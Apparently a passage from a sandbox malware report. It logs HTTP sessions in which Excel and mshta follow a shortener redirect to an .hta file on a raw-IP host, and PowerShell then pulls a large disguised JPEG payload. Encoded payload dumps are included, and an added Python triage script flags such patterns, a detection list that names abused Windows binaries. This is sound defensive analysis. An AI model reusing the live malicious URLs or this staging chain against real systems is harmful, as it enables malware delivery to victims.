    Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
Dec 3, 2024 14:01:53.980043888 CET | 1236 | IN | Data Raw: 51 50 41 41 45 41 77 41 55 41 63 41 41 41 41 2f 51 78 50 4b 38 44 41 2b 59 76 50 73 37 6a 34 2b 67 74 50 4f 37 44 78 2b 6f 72 50 77 36 6a 70 2b 77 70 50 53 36 44 69 2b 34 6e 50 30 35 6a 61 2b 41 6d 50 57 35 44 54 2b 49 6b 50 34 34 6a 4c 2b 51 69
    Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
Dec 3, 2024 14:01:53.980057001 CET | 1236 | IN | Data Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
    Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
Dec 3, 2024 14:01:53.980264902 CET | 1236 | IN | Data Raw: 51 64 4f 47 6e 44 70 35 38 5a 4f 61 6d 6a 68 35 73 58 4f 6d 6c 54 57 35 34 55 4f 66 6b 54 41 34 77 50 4f 33 6a 44 37 34 41 4e 4f 73 69 54 65 34 51 48 4f 76 68 44 5a 34 4d 44 4f 50 67 6a 43 34 55 77 4e 36 66 6a 33 33 63 38 4e 73 65 7a 70 33 49 36
    Data Ascii: QdOGnDp58ZOamjh5sXOmlTW54UOfkTA4wPO3jD74ANOsiTe4QHOvhDZ4MDOPgjC4UwN6fj33c8Nsezp3I6NXeze3s2NKdTR3A0N1czE3EgNjbj32ktNObjs20pNzZjb2kmNeZjQ2gjNdYDG2MhNIUD71cdNzWjr1kaNeWjg14VNxUDL1cSNcUDA0YPNYTz004MNDTzp00JNCSTf0gHNtRTU0cENsQzJ0ICNXMz+zE/MWPT0zw8M
Dec 3, 2024 14:01:53.980277061 CET | 1236 | IN | Data Raw: 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44
    Data Ascii: UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP22Tl9EXPq1TZ8UPP5sja6YrOxqjk5YZO1lTU5oUOFhD23E/NBTTZ0sFAAAAOAMA4AAAA9cfPQxDI7o/OdvzJ7sgOyqDm0k1M2PDp
Dec 3, 2024 14:01:53.980290890 CET | 1236 | IN | Data Raw: 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43
    Data Ascii: gNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuP
Dec 3, 2024 14:01:54.099817991 CET | 1236 | IN | Data Raw: 69 6a 66 41 41 41 41 73 41 77 41 67 41 77 50 45 2f 7a 72 2f 6f 35 50 2f 51 6a 68 30 41 45 41 41 41 41 46 41 4d 41 45 41 4d 54 30 7a 51 4d 41 41 41 41 44 41 4d 41 41 41 38 54 39 2f 38 39 50 4a 2f 7a 6d 41 41 41 41 51 41 67 41 77 44 41 41 41 49 7a
    Data Ascii: ijfAAAAsAwAgAwPE/zr/o5P/Qjh0AEAAAAFAMAEAMT0zQMAAAADAMAAA8T9/89PJ/zmAAAAQAgAwDAAAIzAxQfMjHTxxYLAAAAFAIA4AAAA5IUOhkzD5AAOaDAAAQBACAMA1wAN+Tz70UOAAAAEAIAsAwjS84DPgsz+7Q+ODCAAAQBACAKAAAAOdhzU4MxNKYz+2AvNlbj220sN5aTqAAAAgAgAACgP45Dd+AnPs5Da+QmPg5DX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 54.150.207.131 | 443 | 3312 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-03 13:00:55 UTC | 397 | OUT | GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: short.ruksk.com
    Connection: Keep-Alive
2024-12-03 13:00:55 UTC | 484 | IN | HTTP/1.1 302 Found
    Date: Tue, 03 Dec 2024 13:00:55 GMT
    Server: Apache/2.4.41 (Ubuntu)
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
    Vary: Accept
    Content-Type: text/plain; charset=utf-8
    Content-Length: 104
    Connection: close
2024-12-03 13:00:55 UTC | 104 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
    Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49167 | 54.150.207.131 | 443 | 3588 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 13:00:59 UTC | 421 | OUT | GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: short.ruksk.com
Connection: Keep-Alive
2024-12-03 13:01:00 UTC | 484 | IN | HTTP/1.1 302 Found
Date: Tue, 03 Dec 2024 13:01:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
Vary: Accept
Content-Type: text/plain; charset=utf-8
Content-Length: 104
Connection: close
2024-12-03 13:01:00 UTC | 104 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49170 | 54.150.207.131 | 443 | 3312 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-03 13:01:16 UTC | 397 | OUT | GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: short.ruksk.com
Connection: Keep-Alive
2024-12-03 13:01:17 UTC | 484 | IN | HTTP/1.1 302 Found
Date: Tue, 03 Dec 2024 13:01:16 GMT
Server: Apache/2.4.41 (Ubuntu)
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
Vary: Accept
Content-Type: text/plain; charset=utf-8
Content-Length: 104
Connection: close
2024-12-03 13:01:17 UTC | 104 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49174 | 54.150.207.131 | 443 | 4084 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 13:01:21 UTC | 421 | OUT | GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: short.ruksk.com
Connection: Keep-Alive
2024-12-03 13:01:21 UTC | 484 | IN | HTTP/1.1 302 Found
Date: Tue, 03 Dec 2024 13:01:21 GMT
Server: Apache/2.4.41 (Ubuntu)
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
Vary: Accept
Content-Type: text/plain; charset=utf-8
Content-Length: 104
Connection: close
2024-12-03 13:01:21 UTC | 104 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
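Sessions 1 to 3 above are the same shortener hop taken three times (mshta.exe twice, EXCEL.EXE once over TLS to short.ruksk.com), each answered with a 302 to an .hta file on a raw-IP XAMPP host over plain HTTP; session 4, which follows, is powershell.exe pulling a 2.2 MB image/jpeg from res.cloudinary.com. The Python below is an added triage example, not code from the report or from Joe Sandbox: it parses request/response text in the form the report prints, attributes each exchange to the originating process, and flags what an analyst would escalate here, namely a LOLBin originating HTTP, a redirect whose Location ends in a script extension, a raw-IP host, a TLS-to-plaintext hop, and a script host downloading a large "image". The sample sessions are reconstructed from sessions 1 and 4 with their header lists abridged; the benign chrome.exe session, the LOLBin list, the 1 MiB threshold, the rule names and the port-443-means-TLS inference are my own choices, not anything the report states.

```python
"""Triage of Joe Sandbox HTTP sessions: attribute each exchange to its process and flag
the patterns seen in this trace (added example; not the report's or Joe Sandbox's code)."""
import re
from urllib.parse import urljoin, urlsplit

# Binaries that rarely originate HTTP on their own (assumed list); a hit is a lead, not a verdict.
LOLBINS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "excel.exe",
           "winword.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXT = (".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".sct", ".ps1")
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
LARGE_BODY = 1024 * 1024  # assumed threshold: 1 MiB is a lot for a script host to fetch


def parse_message(raw):
    """Return (start line, {lower-cased header: value}) for one request or response block."""
    lines = [line.strip() for line in raw.strip().splitlines()]
    headers = {}
    for line in lines[1:]:
        if not line:          # a blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def analyze(session):
    """session: {'process': image path, 'dst_port': int, 'request': text, 'response': text}.
    Returns a list of (rule, detail) tuples in the order the rules fire."""
    findings = []
    exe = session["process"].rsplit("\\", 1)[-1].lower()
    req_line, req_h = parse_message(session["request"])
    status_line, resp_h = parse_message(session["response"])
    method, target, _ = req_line.split(" ", 2)
    scheme = "https" if session["dst_port"] == 443 else "http"  # the sandbox shows decrypted TLS
    url = f"{scheme}://{req_h.get('host', '?')}{target}"
    status = int(status_line.split()[1])

    if exe in LOLBINS:
        findings.append(("lolbin-http", f"{exe} {method} {url}"))

    location = resp_h.get("location")
    if 300 <= status < 400 and location:
        hop = urlsplit(urljoin(url, location))          # resolve relative Locations too
        if hop.path.lower().endswith(SCRIPT_EXT):
            findings.append(("redirect-to-script", hop.geturl()))
        if IPV4_HOST.match(hop.hostname or ""):
            findings.append(("ip-literal-host", hop.hostname))
        if scheme == "https" and hop.scheme == "http":
            findings.append(("https-to-http-downgrade", hop.geturl()))

    ctype = resp_h.get("content-type", "").split(";")[0].strip().lower()
    clen = int(resp_h.get("content-length") or 0)
    if exe in SCRIPT_HOSTS and status == 200 and clen >= LARGE_BODY and (
            ctype.startswith("image/") or ctype == "application/octet-stream"):
        findings.append(("script-host-large-download", f"{exe} {url} {ctype} {clen} bytes"))
    return findings


# Constructed samples: sessions 1 and 4 from the report, header lists abridged,
# plus an invented benign browser fetch to show the rules stay quiet on it.
SESSION_1 = {
    "process": r"C:\Windows\System32\mshta.exe", "dst_port": 443,
    "request": """GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0)
Host: short.ruksk.com
Connection: Keep-Alive""",
    "response": """HTTP/1.1 302 Found
Server: Apache/2.4.41 (Ubuntu)
Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
Content-Type: text/plain; charset=utf-8
Content-Length: 104""",
}
SESSION_4 = {
    "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "dst_port": 443,
    "request": "GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1\nHost: res.cloudinary.com",
    "response": "HTTP/1.1 200 OK\nContent-Length: 2230233\nContent-Type: image/jpeg\nServer: Cloudinary",
}
SESSION_BENIGN = {
    "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dst_port": 443,
    "request": "GET /index.html HTTP/1.1\nHost: example.com",
    "response": "HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: 1256",
}

if __name__ == "__main__":
    for name, session in [("1", SESSION_1), ("4", SESSION_4), ("benign", SESSION_BENIGN)]:
        for rule, detail in analyze(session) or [("-", "no findings")]:
            print(f"session {name}: {rule}: {detail}")
```

Session 1 fires all four redirect-related rules; session 4 fires only the LOLBin and large-download rules, which is the right shape: the shortener hop and the payload fetch are different stages and want different follow-up (blocking the .hta host versus pulling the JPEG to see what PowerShell does with it). The rules are deliberately loose; they are meant to surface the chain, not to replace the Sigma and YARA verdicts in the report header.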


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49176 | 151.101.65.137 | 443 | 2112 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 13:01:34 UTC | 127 | OUT | GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
Host: res.cloudinary.com
Connection: Keep-Alive
2024-12-03 13:01:34 UTC | 750 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 2230233
Content-Type: image/jpeg
Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
Date: Tue, 03 Dec 2024 13:01:34 GMT
Strict-Transport-Security: max-age=604800
Cache-Control: public, no-transform, immutable, max-age=2592000
Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-03T13:01:34.667Z;desc=hit,rtt;dur=177,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
Server: Cloudinary
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
x-request-id: 6f487a4c60d72621f2efeecff85ca20a
2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
